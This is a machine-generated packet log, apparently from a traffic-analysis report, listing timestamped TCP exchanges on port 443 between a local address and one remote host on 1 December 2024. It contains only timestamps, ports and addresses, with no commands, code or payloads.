                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.689225912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.689316034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.689944029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.696151972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.696167946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.696247101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.696255922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.696330070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.702517986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.702533960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.702588081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.702594995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.702635050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.702635050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.754628897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.786797047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.786818027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.786870956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.786878109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.786912918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.786933899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.856198072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.856256962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.856286049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.856298923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.856311083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.856364012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.861460924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.861484051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.861531019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.861540079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.861561060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.861571074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.875962973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.875982046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.876015902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.876023054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.876068115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.881823063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.881845951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.881916046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.881916046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.881923914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.881989956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.886920929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.886936903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.886977911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.886985064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.887041092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.892596006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.892611980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.892661095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.892668009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.892708063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.897968054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.897984028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.898017883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.898024082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.898056030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.898132086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.917032957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.986984968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.987009048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.987050056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.987072945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.987092972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.987121105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.057487011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.057507992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.057559967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.057569027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.057590961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.057605028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.062793016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.062813044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.062849998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.062855959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.062892914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.062892914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.077548027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.077565908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.077652931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.077663898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.077738047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.084255934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.084273100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.084342957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.084352016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.084408045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.088246107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.088263035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.088320971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.088327885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.088392973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.094070911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.094099045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.094132900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.094144106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.094167948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.094175100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.126418114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.183684111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.183710098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.183799028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.183809042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.183885098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.188155890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.188175917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.188239098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.188249111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.188296080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.210930109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.259119987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.259150028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.259279013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.259291887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.259342909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.263959885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.263986111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.264070034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.264079094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.264209986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.278978109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.278997898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.279056072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.279067039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.279103041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.279103041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.284647942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.284666061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.284743071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.284750938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.284799099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.285866976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.289587021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.289603949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.289661884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.289670944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.289716959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.291888952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.295331955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.295351028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.295403957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.295412064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.295449972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.295449972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.311590910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.677125931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.677148104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.677211046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.677225113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.677247047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.677303076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.679405928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.679428101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.679483891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.679512978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.679559946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.693399906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.693422079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.693497896 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.693497896 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.693516016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.693586111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.694808006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.694830894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.694885015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.694900990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.694947958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.694947958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.696758986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.696778059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.696842909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.696842909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.696856976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.696932077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.699486971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.699507952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.699559927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.699569941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.699589968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.699645042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.700820923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.700843096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.700930119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.700930119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.700949907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.700984001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.701733112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.701750994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.701811075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.701824903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.701919079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.702728987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.711875916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.711908102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.711950064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.711961031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.711993933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.712004900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.714169025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.714190960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.714258909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.714258909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.714271069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.716655970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.722341061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.722367048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.722464085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.722486973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.723337889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.723362923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.723409891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.723418951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.723488092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.724679947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.724697113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.724750996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.724771023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.725578070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.725601912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.725650072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.725650072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.725658894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.725709915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.727557898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.727576017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.727634907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.727644920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.728694916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.729770899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.729792118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.729836941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.729849100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.729860067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.729902983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.732873917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.788741112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.788773060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.788837910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.788853884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.788902044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.788902044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.793210983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.793231010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.793289900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.793298006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.793421984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.864610910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.864639997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.864743948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.864762068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.864896059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.869055033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.869072914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.869139910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.869154930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.869277954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.883804083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.883835077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.883886099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.883900881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.883912086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.883980036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.886981964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.889498949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.889528036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.889580011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.889590979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.889677048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.895076036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.895108938 CET44349721142.132.252.48192.168.2.6
